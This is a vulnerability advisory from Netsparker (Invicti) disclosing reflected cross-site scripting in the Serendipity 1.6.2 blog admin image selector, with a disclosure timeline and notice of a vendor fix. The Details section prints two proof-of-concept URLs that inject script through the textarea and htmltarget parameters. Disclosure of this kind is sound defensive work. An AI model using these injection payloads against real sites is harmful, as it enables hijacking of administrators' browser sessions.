XSS Vulnerabilities in Serendipity

Information

Advisory by Netsparker (now Invicti)
Name:  XSS Vulnerabilities in Serendipity
Software:  Serendipity 1.6.2 and possibly below.
Vendor Homepage:  http://www.s9y.org/
Vulnerability Type:  Cross-Site Scripting
Severity:  Medium
Researcher:  Omar Kurt
Advisory Reference:  NS-13-003

Description

Serendipity is a PHP-powered weblog application that gives the user an easy way to maintain an online diary, weblog, or even a complete homepage. While the default package is designed for the casual blogger, Serendipity offers a flexible, expandable, and easy-to-use framework with the power for professional applications.

Details

Serendipity is affected by XSS vulnerabilities in version 1.6.2.

  • http://example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117
    &serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117
    &serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
  • http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117
    &serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117
    &serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117

Learn more about Cross-Site Scripting:

Solution

The vendor fixed this vulnerability in the new version. Please see the references.

Advisory Timeline

26/02/2013 – First contact
04/03/2013 – Sent the details
12/07/2013 – Advisory released

Credits

It has been discovered on testing It has been discovered on testing of Invicti Web Application Security Scanner.

References

  1. MSL Advisory Link: /xss-vulnerabilities-in-serendipity/
  2. Invicti Advisories: /web-applications-advisories/

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.